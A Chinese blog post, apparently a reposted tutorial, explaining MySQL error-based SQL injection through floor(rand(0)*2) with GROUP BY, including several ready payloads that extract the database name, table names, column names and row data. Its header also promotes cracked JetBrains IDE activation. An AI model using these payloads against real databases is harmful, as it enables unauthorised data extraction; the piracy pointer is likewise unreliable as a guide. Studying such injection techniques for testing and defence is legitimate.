1. 全栈程序员必看首页

group by 报错_group by null

全栈程序员-站长 未分类 阅读 3

group by 报错_group by nullfloor()报错注入playloadselect(concat(database(),floor(rand(0)2)))x,concat()frominformation_schema.tablesgroupbyx;函数count(*)函数返回给定选择中被选的函数concat()连接字符串floor()向下取整rand()随机数函数rand(0)伪随机数,生成的随…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

文章目录

mysql bug #8652
有可能不成功,依赖于生成的两次虚拟表的主键不同引发报错

playload

floor():
select concat(floor(rand(0)*2),0x5e,version(),0x5e)x,count(*) from test group by x;
select concat(0x5e,version(),0x5e,floor(rand(0)*2))x,count(*) from (select 1 union select 2 union select 3)a group by x; //数据不足三条或者关键表被禁用

round():
select concat(0x5e,version(),0x5e,round(rand(0)))x,count(*) from test group by x;

left():
select concat(0x5e,version(),0x5e,left(rand(0),3))x,count(*) from test group by x;

rand(),count()被禁用:
select min(@a:=1) from test group by concat(0x5e,@@version,0x5e,@a:=(@a+1)%2);

语句随机应变

函数

group by:分组方式,作为虚拟表的主键
count(*)返回满足条件的行的个数
group by 报错_group by null
concat()连接字符串
group by 报错_group by null
floor()向下取整
round()四舍五入
left(,3)从左向右取三位
rand()随机数函数
rand(0)伪随机数,生成的随机数有规律
group by 报错_group by null
floor(rand(0)*2)
生成的随机数存在规律0110110011101
group by 报错_group by null

原理解析

count函数是统计满足条件的行的个数,它的工作原理是先建一个虚拟表(key是主键,不可被重复)
group by 报错_group by null
先查询数据库中的数据,存在则个数加1,不存在则插入新数据
mysql官方规定,查询时使用rand()函数时,该值会计算多次,即查看虚拟表中是否含有这个数据时,rand函数计算一次,当数据不存在时,会插入数据(rand函数计算的值),插入时rand汉再计算一次
结合floor(rand(0)*2)是有规律的随机数,也就是说:

select floor(rand(0)*2)x,count(*) from test group by x
(select floor(rand(0)*2) as x,count(*) from test group by x)
当查询第一个数据时,x的第一个值是0,在虚拟表中没有这个数据,所以插入数据,count值加1,插入时floor(rand(0)*2)会再被计算一次,值为1,即插入的数据是1,并不是0
group by 报错_group by null
查询第二个数据,此时x的值为1,存在这个数据,count值加1,不需要插入数据,所以floor(rand(0)*2)不会被再次计算
group by 报错_group by null
继续查询数据,此时x值为0,虚拟表中不存在0,所以要插入新数据,此时floor(rand(0)*2)再次被计算,值为1,但是floor(rand(0)*2)是主键,不能被重复,所以此时会报错,报错内容是 1这个主键重复
group by 报错_group by null
虚拟表总共查询的次数为三次,所以floor报错注入满足的条件是数据库中要查询的数据至少3条以上。
我们利用报错信息会把重复的主键打印出来,构造playload,利用concat将我们需要的信息与floor拼接

select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x;(查库)

group by 报错_group by null

select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=“test” limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x;(查表)

group by 报错_group by null

select count(*),concat((select concat(column_name) from information_schema.columns where table_name=“test” limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x;(查列名)

group by 报错_group by null

select count(*),concat((select concat(id,0x3a,name,0x3a,age) from test limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x;

group by 报错_group by null

注入语句:

select id from test where id=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a);

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/187642.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • java 除法取整_java 除法运算只保留整数位的4种方式

    java 除法取整_java 除法运算只保留整数位的4种方式

    java 除法取整_java 除法运算只保留整数位的4种方式1.情景展示根据提供的毫秒数进行除法运算,如果将毫秒数转换成小时,小时数不为0,则只取整数位,依此类推…2.情况分析可以使用3个函数实现Math.floor(num)  只保留整数位Math.rint(num)  余数四舍五入Math.ceil(num)  取整位,再+1举例:doublenum=3.1415926;System.out.println(Math.floor…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月5日
    115
  • VMware虚拟机 桥接模式 无法上网 校园网「建议收藏」

    VMware虚拟机 桥接模式 无法上网 校园网「建议收藏」

    VMware虚拟机 桥接模式 无法上网 校园网「建议收藏」VMware桥接模式桥接模式就是将主机网卡与虚拟机虚拟的网卡利用虚拟网桥进行通信。在桥接的作用下,类似于把物理主机虚拟为一个交换机,所有桥接设置的虚拟机连接到这个交换机的一个接口上,物理主机也同样插在这个交换机当中,所以所有桥接下的网卡与网卡都是交换模式的,相互可以访问而不干扰。在桥接模式下,虚拟机ip地址需要与主机在同一个网段,如果需要联网,则网关与DNS需要与主机网卡一致。无法上网的检查步骤1.VMware中虚拟网络编辑器设置桥接网卡在“编辑”——“虚拟网络编辑器”里进.

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月7日
    126
  • java编译后执行 错误:找不到或无法加载主类「建议收藏」

    java编译后执行 错误:找不到或无法加载主类「建议收藏」

    java编译后执行 错误:找不到或无法加载主类「建议收藏」使用java命令运行class文件提示“错误:找不到或无法加载主类“的问题分析有时候我们需要直接用jdk提供的java命令来执行class文件让软件运行起来,特别是很多初学者,但经常会发现如下提示:用eclipse或用ant则没有问题。其实原因很简单,我们忽略了2个细节。1.java指令默认在寻找class文件的地址是通过CLASSPATH环境变量中指定的目录中寻找的。2….

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月30日
    92
  • Android R setenforce 实现[通俗易懂]

    Android R setenforce 实现[通俗易懂]

    Android R setenforce 实现[通俗易懂]1、开机启动system/core/init/main.cppintmain(intargc,char**argv){#if__has_feature(address_sanitizer)__asan_set_error_report_callback(AsanReportCallback);#endifif(!strcmp(basename(argv[0]),”ueventd”)){returnueventd_main(argc,.

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月27日
    48
  • c++动态库和静态库的区别_静态库里面包含动态库

    c++动态库和静态库的区别_静态库里面包含动态库

    c++动态库和静态库的区别_静态库里面包含动态库                                          C++静态库与动态库这次分享的宗旨是——让大家学会创建与使用静态库、动态库,知道静态库与动态库的区别,知道使用的时候如何选择。这里不深入介绍静态库、动态库的底层格式,内存布局等,有兴趣的同学,推荐一本书《程序员的自我修养——链接…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月30日
    4
  • pip 更新matplotlib「建议收藏」

    pip 更新matplotlib「建议收藏」

    pip 更新matplotlib「建议收藏」pip更新matplotlib命令:pipinstallmatplotlib–upgrade–user加–user是由于很多python包是安装在C盘中,去做更改时需要管理员权限。

    全栈程序员-站长的头像 全栈程序员-站长
    2025年5月26日
    1

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号